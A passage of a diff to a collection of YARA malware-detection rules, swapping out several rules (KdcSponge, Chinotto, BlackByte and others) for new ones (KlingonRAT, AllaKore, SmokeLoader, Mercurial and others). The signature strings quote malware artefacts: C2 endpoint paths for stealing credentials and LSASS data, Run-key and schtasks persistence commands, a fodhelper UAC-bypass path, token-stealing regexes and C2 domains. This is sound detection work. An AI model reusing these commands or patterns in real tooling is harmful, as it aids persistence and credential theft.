"60d41d6d789f1cd2a7040d6535f13c69ea58a489035838f047b886e8f1f37f63" score = 75 - quality = 75 + quality = 73 tags = "FILE" strings: - $s1 = ":\\Users\\ZombieBoy\\" ascii wide - $s2 = "RookIE/1.0" fullword ascii wide + $s1 = /64loadpath(xp|sv|7)/ fullword wide + $s2 = "{\"Actions\":[]}" fullword wide + $s3 = "PlatformsChunk" fullword wide + $s4 = "CurrentPluginCategory" fullword wide + $s5 = "CurrentOperationPlatform" fullword wide + $s6 = "PersistencePlugins" fullword wide + $s7 = "memory_library_file" fullword wide + $s8 = "LoadPluginBP" fullword ascii + $s9 = "GetOperationBasicInformation" fullword ascii + $s10 = "commonappdata/Intel/Runtime" wide + $s11 = "cfsst x64" fullword wide + $s12 = "ForkOperation" fullword ascii + $c1 = "domain.dns04.com:8080;domain.dns04.com:443;acro.ns1.name:80;acro.ns1.name:1863;" wide + $c2 = "3 and 4 of them ))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Kdcsponge : FILE +rule DITEKSHEN_MALWARE_Win_Klingonrat : FILE { meta: - description = "Detects KdcSponge" + description = "Detects KlingonRAT" author = "ditekSHen" - id = "8832a141-a85d-5604-992e-7e9bd892d410" - date = "2024-09-06" - modified = "2024-09-06" + id = "bea50bce-b38c-50a0-902a-1014615bd9b8" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8670-L8700" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "c891db94df9cde9eaa6096ad68d96c7b85a9c03e255ce43ccb8543a016bd3853" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6405-L6427" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "2abfbfc1b67f931f15bfdfd2cd4ba7821e62eb8c518bbc04629c0dd694bbd9c1" score = 75 - quality = 65 + quality = 75 tags = "FILE" - hash1 = "e391c2d3e8e4860e061f69b894cf2b1ba578a3e91de610410e7e9fa87c07304c" strings: - $x1 = "\\share\\kdcdll\\user641.pdb" ascii - $x2 = "5ADSelf@tech*7890" fullword wide - $kdc1 = "KdcVerifyEncryptedTimeStamp" ascii wide nocase - $kdc2 = "KerbHashPasswordEx3" ascii wide nocase - $kdc3 = "KerbFreeKey" ascii wide nocase - $r1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" ascii - $r2 = "KDC Service" fullword ascii - $s1 = "download//symbols//%S//%S//%S" fullword wide - $s2 = "c:\\windows\\system32\\kdcsvc.dll" fullword wide nocase - $s3 = /WinHttp(Send|Receive)(Request|Response) failed (0x%.8X)/ fullword wide + $go = "Go build ID:" ascii + $s1 = "/UCRelease/src/client/uac/once/" + $s2 = "%T\\AppData\\Local\\Windows Update\\" + $s3 = "%TSoftware\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\" + $s4 = "wmic /namespace:'\\\\root\\subscription' PATH" + $s5 = "C:\\Windows\\System32\\fodhelper.exeCaption,ParentProcessId,ProcessId" + $s6 = "ldpro.exelsass.exeluall.exeluspt.exe" + $s7 = "scangui.exedeps/lsass.exeetrustcipe.exefile" + $s8 = "alogserv.exeaplica32.exeapvxdwin.exeatro55en.exeautodown.exeavconsol.exeavgserv9.exeavkwctl9.exeavltmain.exeavpdos32.exeavsynmgr.exeavwupd32.exeavwupsrv.exe" + $c1 = "%s/keyLogger?machineId=%s" ascii + $c2 = "%s/stealer?machineId=%s" ascii + $c3 = "%s/lsass?machineId=%s" ascii + $c4 = "%s/logger?machineId=%s" ascii + $c5 = "%s/machineInfo?machineId=%s" ascii + $c6 = "failurehttps://%s:%d/botif-modified-sinceillegal" ascii condition: - uint16(0)==0x5a4d and ((1 of ($x*) and 2 of them ) or ( all of ($kdc*) and (1 of ($x*) or all of ($r*) or 2 of ($s*))) or (8 of them ) or (pe.exports("MainFun") and pe.exports("NetApiBufferFree") and pe.exports("BeaEngineRevision") and pe.exports("BeaEngineVersion") and pe.exports("Disasm") and pe.exports("DllRegisterServer") and pe.exports("DsGetDcName") and 2 of them )) + uint16(0)==0x5a4d and ($go) and (3 of ($c*) or 5 of ($s*) or (3 of ($s*) and 1 of ($c*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Chinotto : FILE +rule DITEKSHEN_MALWARE_Win_Xfiles : FILE { meta: - description = "Detects Chinotto" + description = "Detects X-Files infostealer (formerly BotSh1zoid)" author = "ditekSHen" - id = "e66703d4-c9c6-5bb4-9e07-11dc89b0a034" - date = "2024-09-06" - modified = "2024-09-06" + id = "3f8b2f9b-aa6a-5ffc-95b8-5e44de0d1a49" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8702-L8754" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "92f37bdc4cf17e07bb556c60e3bde4547c34f67a2fb5c806000d9cb2446adff1" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6429-L6460" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "0c04a8f019aea36f4bba3ce8289c2d608c69d76bbf321052560b4ca2214be057" score = 75 quality = 73 tags = "FILE" strings: - $x1 = "xxxchinotto" ascii wide - $x2 = "\\Chinotto.pdb" ascii wide - $x3 = { 50 4f 53 54 20 25 73 20 48 54 54 50 2f 31 2e 31 - 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e - 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 - 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f - 7a 69 6c 6c 61 2f 34 2e 30 28 63 6f 6d 70 61 74 - 69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b 20 - 57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b 20 - 53 56 31 29 0d 0a 41 63 63 65 70 74 3a 20 69 6d - 61 67 65 2f 67 69 66 2c 20 69 6d 61 67 65 2f 78 - 2d 78 62 69 74 6d 61 70 2c 20 69 6d 61 67 65 2f - 6a 70 65 67 2c 20 69 6d 61 67 65 2f 70 6a 70 65 - 67 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 - 2d 73 68 6f 63 6b 77 61 76 65 2d 66 6c 61 73 68 - 2c 20 2a 0d 0a 41 63 63 65 70 74 2d 4c 61 6e 67 - 75 61 67 65 3a 20 65 6e 2d 75 73 0d 0a 43 6f 6e - 74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 - 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 3b 62 - 6f 75 6e 64 61 72 79 3d 25 73 0d 0a 48 6f 73 74 - 3a 20 25 73 3a 25 64 0d 0a 43 6f 6e 74 65 6e 74 - 2d 4c 65 6e 67 74 68 3a 20 25 64 0d 0a 43 6f 6e - 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c - 69 76 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 - 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 0d 0a - 00 00 00 00 48 54 54 50 2f 31 2e 31 20 32 30 30 - 20 4f 4b 00 0d 0a 0d 0a 00 00 00 00 65 72 72 6f - 72 3c 2f 62 3e } - $s1 = "Run /v xxxzexs /t REG_SZ /d %s /f" ascii wide - $s2 = "ShellExecute Error, ret" ascii wide - $s3 = "Run app succeed" ascii - $s4 = "cleartemp:" fullword ascii - $s5 = "wakeup:" fullword ascii - $s6 = "updir:" fullword ascii - $s7 = "regstart:" fullword ascii - $s8 = "chdec:" fullword ascii - $s9 = "cmd:" fullword ascii - $s10 = "error" fullword ascii - $c1 = "Host: %s:%d" ascii wide - $c2 = "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1; SV1)" ascii wide - $c3 = "Mozilla/5.0(Windows NT 10.0; Win64; x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/78.0.3904.108 Safari/537.36" ascii wide - $c4 = "id=%s&type=hello&direction=send" ascii wide - $c5 = "id=%s&type=command&direction=receive" ascii wide - $c6 = "id=%s&type=file&direction=" ascii wide - $c7 = "id=%s&type=result&direction=" ascii wide + $x1 = "\\BotSh1zoid\\" ascii + $x2 = "\\BuildPacker.pdb" ascii + $x3 = "\\Svc_host.pdb" ascii nocase + $s1 = "WDefender" fullword ascii + $s2 = "CheckDefender" fullword ascii + $s3 = "RunPS" fullword ascii + $s4 = "DownloadFile" fullword ascii + $v1_1 = "(.*)" wide + $v1_2 = "Grabber\\" wide + $v1_3 = "/log.php" wide + $v1_4 = /Browsers\\(Logins|Cards|Cookies)/ wide + $v1_5 = "b__" ascii + $v1_6 = "record_header_field" fullword ascii + $v1_7 = "JavaScreenshotiptReader" fullword ascii + $v1_8 = "HTTPDebuggerPro" wide + $v1_9 = "IEInspector" wide + $v1_10 = "Fiddler" wide + $v2_1 = /get_(Cookie|Logins|Cards)Path/ fullword ascii + $v2_2 = "get_AllScreens" fullword ascii + $v2_3 = "{0}_{1}_{2}.zip" fullword wide + $v2_4 = "\\Stealer" fullword wide + $g1 = "$983a3552-4ec3-4936-bd4a-8e6fd67b4c67" fullword ascii + $g2 = "$a5d9ca4d-400f-4e07-8c09-a916b548f2e3" fullword ascii + $g3 = "$ebc25cf6-9120-4283-b972-0e5520d0000C" fullword ascii condition: - uint16(0)==0x5a4d and (2 of ($x*) or (1 of ($x*) and (2 of ($s*) or 2 of ($c*))) or 4 of ($c*) or 5 of ($s*)) + uint16(0)==0x5a4d and ((1 of ($x*) and (3 of ($s*) or 3 of ($v1*) or 3 of ($v2*))) or 7 of ($v1*) or 3 of ($v2*) or (2 of ($g*) and 3 of them )) } import "pe" -rule DITEKSHEN_MALWARE_Win_Tardigrade : FILE +rule DITEKSHEN_MALWARE_Win_Allakore : FILE { meta: - description = "Detects Tardigrade" + description = "Detects AllaKore" author = "ditekSHen" - id = "a46caaaa-2954-552a-a20f-952c47370393" - date = "2024-09-06" - modified = "2024-09-06" + id = "371663c1-6faf-5ca3-a79e-e4340d44660b" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8756-L8787" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "2bd4f23f66844a320b6bed6242ba39096f66a08affb84abd78c342d433ed9fe6" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6462-L6493" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "0e93682787e27246cdddbd67ca5360728c65049a2e97e71809b5902854aa4bef" score = 75 - quality = 75 + quality = 73 tags = "FILE" - hash1 = "c0976a1fbc3dd938f1d2996a888d0b3a516b432a2c38d788831553d81e2f5858" - hash2 = "966b2c7c72a28310acd58bb23af4d3c893b2afca264b2d9c0ec42db815c77487" - hash3 = "88be5da274df704dc7fd9882c661a0afdd35f1ce0a7145e30f51c292abd2a86b" - hash4 = "cf88926b7d5a5ebbd563d0241aaf83718b77cec56da66bdf234295cc5a91c5fe" - hash5 = "4afd9f0dde092daeac3f3e6ffb0aee06682b3dba6005d2bd1a914eefd5cc6a30" strings: - $x1 = "cmd.exe /c echo kOJAdtQoDcMuogIZIl>\"%s\"&exit" fullword ascii - $x2 = "cmd.exe /c echo HBnBcZPeUevCDQmKGzXxYJHqpzRAbRCQCihOxiLi>\"%s\"&exit" fullword ascii - $x3 = "cmd.exe /c set kpUUCjoLWLZvJFc=3167 & reg add HKCU\\SOFTWARE\\EQwIobTRgsJ /v PDMXPmqSYnUx /t REG_DWORD /d 10080 & exit" fullword ascii - $s1 = "ReplaceFileA" ascii - $s2 = "FlushFileBuffers" ascii - $s3 = "WaitNamedPipeA" ascii - $s4 = "ImpersonateNamedPipeClient" ascii - $s5 = "RegFlushKey" ascii - $s6 = /cmd\.exe \/c (echo|set)/ ascii - $s7 = ">\"%s\"&exit" ascii + $x1 = "AllaKore Remote - Chat" fullword wide + $x2 = "AllaKore Remote - Share Files" fullword wide + $x3 = "CYRUS - Chat" fullword wide + $x4 = "CYRUS - Share Files" fullword wide + $x5 = "<|REDIRECT|><|GETFOLDERS|>" fullword wide + $x6 = "<|REDIRECT|><|DOWNLOADFILE|>" fullword wide + $x7 = "<|REDIRECT|><|WHEELMOUSE|>" fullword wide + $x8 = "<|REDIRECT|><|SETMOUSE" wide + $x9 = "<|CHECKIDPASSWORD|>" fullword wide + $x10 = "<|KEYBOARDSOCKET|>" fullword wide + $x11 = "<|REDIRECT|><|CLIPBOARD|>" fullword wide + $x12 = "<|IDEXISTS!REQUESTPASSWORD|>" fullword wide + $x13 = "<|GETFULLSCREENSHOT|>" fullword wide + $x14 = "<|MAINSOCKET|>" fullword ascii + $s1 = "You can not connect with yourself!" wide + $s2 = "Waiting for authentication..." wide + $s3 = "Connected support!" wide + $s4 = "ID does nor exists." wide + $s5 = "Finding the ID..." wide + $s6 = "PC is Busy!" wide + $s7 = "Upload & Execute" fullword ascii + $s8 = "Download file selected" fullword ascii + $s9 = "CaptureKeys_TimerTimer" fullword ascii + $s10 = "Remote File Manager" fullword ascii condition: - uint16(0)==0x5a4d and pe.is_dll() and (1 of ($x*) or 6 of ($s*)) and (pe.exports("DllGetClassObject") and pe.exports("DllMain") and pe.exports("DllRegisterServer") and pe.exports("DllUnregisterServer") and pe.exports("InitHelperDll") and pe.exports("StartW")) + uint16(0)==0x5a4d and (4 of ($x*) or 4 of ($s*) or (3 of ($s*) and 2 of ($x*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Clipbanker02 : FILE +rule DITEKSHEN_MALWARE_Win_Reverserat : FILE { meta: - description = "Detects ClipBanker infostealer" + description = "Detects ReverseRAT" author = "ditekSHen" - id = "c2a480cf-e81b-53a2-999a-80209050e0cf" - date = "2024-09-06" - modified = "2024-09-06" + id = "df13fc6c-025a-54db-809d-4f3c27b8aa7a" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8789-L8814" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "51a43245b1e0b6fea874302b73bf552012c54c3f7c12b8c447c96c2ffdcc1dcb" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6495-L6514" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "87ab00a5588bfce04ec47a07b184fffe359e472ac8bf561b02a8b070edf2e014" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "\\Allcome\\Source code\\Clipper\\" ascii nocase - $x2 = "\\cleaper\\Release\\cleaper.pdb" ascii nocase - $v1_1 = "&username=" fullword ascii - $v1_2 = "/card.php?data=" fullword ascii - $v1_3 = "/Create /tn MicrosoftDriver /sc MINUTE /tr" fullword ascii - $v1_4 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0" fullword ascii - $v1_5 = "/API/Clipper/ykesqk0o.php?cf6zrlhn=" fullword ascii - $v1_6 = "&di7ztth6=" fullword ascii - $v1_7 = "/API/Clipper/hr627gzk.php?v6etwxo5=" fullword ascii - $v2_1 = "bitcoincash:" fullword ascii - $v2_2 = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" ascii - $re1 = "^[0-9]{16}$" fullword ascii - $re2 = "^[0-9]{4}\\s[0-9]{4}\\s[0-9]{4}\\s[0-9]{4}" fullword ascii - $re3 = "^\\d{2}\\D\\d{2}" fullword ascii - $re4 = "^[0-9]{3}" fullword ascii - $re5 = "([\\W]?[0-9]{4}[\\W]?[0-9]{4}[\\W]?[0-9]{4}[\\W]?[0-9]{4}[\\W]?)" fullword ascii - $re6 = "(\\d{2}\\D\\d{2})" fullword ascii - $re7 = "(\\d{3})" fullword ascii + $pdb1 = "\\ReverseRat.pdb" ascii nocase + $pdb2 = "\\ReverseRat\\obj\\" ascii nocase + $s1 = "processCmd" fullword ascii + $s2 = "CmdOutputDataHandler" fullword ascii + $s3 = "sendingProcess" fullword ascii + $s4 = "SetStartup" fullword ascii + $s5 = "RunServer" fullword ascii + $s6 = "_OutputDataReceived" ascii + $s7 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 + 00 03 0a 00 00 13 74 00 65 00 72 00 6d 00 + 69 00 6e 00 61 00 74 00 65 00 00 09 65 00 + 78 00 69 00 74 00 } condition: - uint16(0)==0x5a4d and ((1 of ($x*) and (5 of ($v1*) or all of ($v2*))) or (3 of ($re*) and (2 of ($v1*) or 2 of ($v2*)))) + uint16(0)==0x5a4d and ((1 of ($pdb*) and 2 of ($s*)) or 5 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Badjoke : FILE +rule DITEKSHEN_MALWARE_Win_Smokeloader : FILE { meta: - description = "Detects BadJoke / Witch" + description = "Detects SmokeLoader variants" author = "ditekSHen" - id = "082727d5-618f-542d-93ca-ba93be16cd80" - date = "2024-09-06" - modified = "2024-09-06" + id = "e8f28f89-3a79-5d78-8c0a-bad16a57df84" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8816-L8831" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "4699a772bcd50d2fe43740df59a4c56598ba43ebcc18acbf8ec401b6f5a01fe6" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6516-L6539" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "65c56ed11a3cb4e4bcf8fd2a6be097545cb96e84ba4c4202969d1d163a2a36ed" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "msdownld.tmp" fullword ascii - $s2 = "UPDFILE%lu" fullword ascii - $s3 = "Command.com /c %s" fullword ascii - $s4 = "launch.cmd" fullword ascii - $s5 = "virus.vbs" fullword ascii - $s6 = "virus.py" fullword ascii - $m1 = "Message from Google Virus" ascii - $m2 = "you cannot get rid of this virus" ascii + $x1 = "G2A/CLP/05/RYS" fullword wide + $x2 = "0N1Y/53R10U5/BU51N355" fullword wide + $x3 = "CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG" fullword wide + $s1 = "Azure-Update-Task" fullword wide + $s2 = "C:\\Windows\\System32\\schtasks.exe" fullword wide + $s3 = "/C /create /F /sc minute /mo 1 /tn \"" fullword wide + $s4 = "\\Microsoft\\Network" fullword wide + $s5 = "\\Microsoft\\TelemetryServices" fullword wide + $s6 = "\" /tr \"" fullword wide + $e1 = "\\sqlcmd.exe" fullword wide + $e2 = "\\sihost.exe" fullword wide + $e3 = "\\fodhelper.exe" fullword wide condition: - uint16(0)==0x5a4d and ( all of ($m*) or all of ($s*) or (1 of ($m*) and 2 of ($s*))) + uint16(0)==0x5a4d and ((1 of ($x*) and 4 of ($s*)) or (5 of ($s*) and 1 of ($e*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Heracles : FILE +rule DITEKSHEN_MALWARE_Win_Dlinjector03 : FILE { meta: - description = "Detects Heracles infostealer" + description = "Detects unknown loader / injector" author = "ditekSHen" - id = "36cb9366-c70b-5117-955f-402f87f3a88c" - date = "2024-09-06" - modified = "2024-09-06" + id = "2d0df2d8-5b1c-5408-b8c7-8ca14d57da0f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8833-L8861" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "1d5c80c084f9d6e4692a18f74574179095ecdd5eaadd70b5d16c19702761d74f" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6541-L6551" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "10092e7916775fe0a39baa5714fdda89f443ceabdcc610cc1fcd5a0fb0e68d0c" score = 75 quality = 73 tags = "FILE" strings: - $x1 = "aHR0cHM6Ly9uYWNrZXIudG9hbnNlY3UuY29tL3VwbG9hZHM/a2V5PX" wide - $b1 = "XEdvb2dsZVxDaHJvbWVc" wide - $b2 = "XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3Nlcl" wide - $b3 = "XENvY0NvY1xCcm93c2VyX" wide - $b4 = "VXNlciBEYXRh" wide - $b5 = "RGVmYXVsdA" wide - $b6 = "UHJvZmlsZQ" wide - $b7 = "Q29va2llcw" wide - $b8 = "TG9naW4gRGF0YQ" wide - $b9 = "TG9jYWwgU3RhdGU" wide - $b10 = "bG9jYWxzdGF0ZQ" wide - $b11 = "bG9naW5kYXRh" wide - $s1 = "encrypted_key" fullword wide - $s2 = "d__" ascii - $s3 = "5__" ascii - $s4 = "5__" ascii - $s5 = "5__" ascii - $s6 = "5__" ascii - $s7 = "5__" ascii - $s8 = "5__" ascii - $s9 = "5__" ascii + $x1 = "LOADER ERROR" fullword ascii + $s1 = "_ZN6curlpp10OptionBaseC2E10CURLoption" fullword ascii + $s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii condition: - uint16(0)==0x5a4d and (1 of ($x*) or 8 of ($s*) or (4 of ($b*) and 4 of ($s*))) + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Onlylogger : FILE +rule DITEKSHEN_MALWARE_Win_Coinminer02 : FILE { meta: - description = "Detects OnlyLogger loader variants" + description = "Detects coinmining malware" author = "ditekSHen" - id = "525aa2a0-5090-5f96-999b-67ca4379f897" - date = "2024-09-06" - modified = "2024-09-06" + id = "1878a1b5-4e97-5575-802e-573caded2b3a" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8863-L8882" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "1b39a4d2a6d3a2633cfa98adc1dfe99d10d2493fd06c9f875c56ec7689b7a561" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6553-L6571" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "83760aef667819923a2ac67c006e03bb6d4260b7a4aedd691dd5b145fb50d5c1" score = 75 - quality = 50 + quality = 75 tags = "FILE" strings: - $s1 = { 45 6c 65 76 61 74 65 64 00 00 00 00 4e 4f 54 20 65 6c 65 76 61 74 65 64 } - $s2 = "\" /f & erase \"" ascii - $s3 = "/c taskkill /im \"" ascii - $s4 = "KILLME" fullword ascii - $s5 = "C:\\Windows\\System32\\cmd.exe" fullword ascii - $gn = ".php?pub=" ascii - $ip = /\/1[a-z0-9A-Z]{4,5}/ fullword ascii - $h1 = "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1" fullword ascii - $h2 = "Accept-Language: ru-RU,ru;q=0.9,en;q=0.8" fullword ascii - $h3 = "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1" fullword ascii - $h4 = "Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0" fullword ascii - $h5 = "Content-Type: application/x-www-form-urlencoded" fullword wide + $s1 = "%s/%s (Windows NT %lu.%lu" fullword ascii + $s2 = "\\Microsoft\\Libs\\WR64.sys" wide + $s3 = "\\\\.\\WinRing0_" wide + $s4 = "pool_wallet" ascii + $s5 = "cryptonight" ascii + $s6 = "mining.submit" ascii + $c1 = "stratum+ssl://" ascii + $c2 = "daemon+http://" ascii + $c3 = "stratum+tcp://" ascii + $c4 = "socks5://" ascii + $c5 = "losedaemon+https://" ascii condition: - uint16(0)==0x5a4d and ( all of ($s*) or (#ip>5 and ($gn or 3 of ($s*) or all of ($h*))) or ( all of ($h*) and 3 of ($s*))) + uint16(0)==0x5a4d and (3 of ($s*) and 1 of ($c*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Blackbytego : FILE +rule DITEKSHEN_MALWARE_Win_Mercurial : FILE { meta: - description = "Detects BlackByte ransomware Go variants" + description = "Detects Mercurial infostealer" author = "ditekSHen" - id = "25431446-8cce-54cc-925d-5d9147344c6d" - date = "2024-09-06" - modified = "2024-09-06" + id = "c262ada2-01ca-5fc1-adef-987908514019" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8884-L8904" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b3e6a4a2f043293e8693cfbe1515681ce0616d98e2492732fc06a01a96309883" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6573-L6593" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "400f8f717a4e07bf4de508c02bbcd9e82bf21f3df84c989fc622378f33e192f0" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "BlackByteGO/_cgo_gotypes.go" fullword ascii - $x3 = "BlackByteGO/" ascii nocase - $s1 = ".Disconnect" ascii - $s2 = ".OpenService" ascii - $s3 = ".ListServices" ascii - $s4 = ".Start" ascii - $s5 = ".Encrypt" ascii - $s6 = ".Decrypt" ascii - $s7 = ".MustFindProc" ascii - $s8 = ".QuoRem" ascii - $s9 = "C:\\Windows\\regedit.exe" fullword wide + $x1 = "mercurial grabber" wide nocase + $x2 = "\"text\":\"Mercurial Grabber |" wide + $x3 = "/nightfallgt/mercurial-grabber" wide + $s1 = "/LimerBoy/Adamantium-Thief/" ascii + $s2 = "Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0" fullword wide + $s3 = "StealCookies" fullword ascii + $s4 = "StealPasswords" fullword ascii + $s5 = "DetectDebug" fullword ascii + $s6 = "CaptureScreen" fullword ascii + $s7 = "WebhookContent" fullword ascii + $s8 = /Grab(Token|Product|IP|Hardware)/ fullword ascii + $p1 = "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}" fullword ascii wide + $p2 = "mfa\\.[\\w-]{84}" fullword ascii wide condition: - uint16(0)==0x5a4d and (1 of ($x*) or all of ($s*)) + uint16(0)==0x5a4d and (1 of ($x*) or 5 of ($s*) or ( all of ($p*) and 3 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Vulturi : FILE +rule DITEKSHEN_MALWARE_Win_Phonzy : FILE { meta: - description = "Detects Vulturi infostealer" + description = "Detects specific downloader agent" author = "ditekSHen" - id = "dca814d6-ca26-5315-9f80-628ee50e8dfa" - date = "2024-09-06" - modified = "2024-09-06" + id = "d35f41e4-4633-5482-9ae4-79354463f1b9" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8906-L8931" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "4d1d88764dd72ae78a74b802e11c2f28899b7b9f45c54cf3bf7aaac49dd48d7f" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6595-L6608" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "924e7674d76594314df1a32d38f19cee12a3ed49cdf5e153f98bb08a7634055c" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "Vulturi_" ascii wide - $x2 = "VulturiProject" fullword ascii - $s1 = { 5b 00 2d 00 5d 00 20 00 53 00 65 00 72 00 76 00 - 65 00 72 00 20 00 ?? ?? 20 00 69 00 73 00 20 00 - 6f 00 66 00 66 00 6c 00 69 00 6e 00 65 00 2e 00 - 2e 00 2e 00 00 ?? 5b 00 2b 00 5d 00 20 00 53 00 - 65 00 72 00 76 00 65 00 72 00 20 00 00 ?? ?? 00 - 69 00 